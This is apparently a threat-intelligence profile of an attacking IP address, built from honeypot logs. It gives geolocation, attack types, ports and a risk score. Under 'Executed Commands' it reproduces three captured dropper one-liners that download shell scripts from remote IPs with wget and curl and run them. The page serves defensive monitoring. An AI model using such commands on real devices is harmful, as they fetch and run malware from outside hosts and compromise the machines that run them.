Active Threat β’ HIGH
176.65.139.20
π―
38
Total Attacks
π
12
Ports
π‘
6
Attack Types
π¦
0
Malware
Geolocation
- Country
- πΈπ¬ Singapore
- City
- Unknown
- ASN
- AS16276
- ISP
- OVH SAS
Attack Types
cowrie
honeyaml
adbhoney
dionaea
tanner
honeytrap
Attacked Ports
2380813000300155005555603617000170014563456575
Associated Malware
No associated malware
Executed Commands
$
cd /data/local/tmp/; busybox wget http://176.65.139.21/file/w.sh; sh w.sh; curl http://176.65.139.21/file/c.sh; sh c.sh2x$
cd /data/local/tmp/; busybox wget http://130.12.180.120/file/w.sh; sh w.sh; curl http://130.12.180.120/file/c.sh; sh c.sh1x$
cd /data/local/tmp/ || cd /tmp ||cd /var/run||cd /mnt||cd /root || cd /; busybox wget -q http://130.12.180.151/file/w.sh; sh w.sh; curl -O http://130.12.180.151/file/c.sh; sh c.sh;1xRisk Assessment
60
/100
LowMediumHighCritical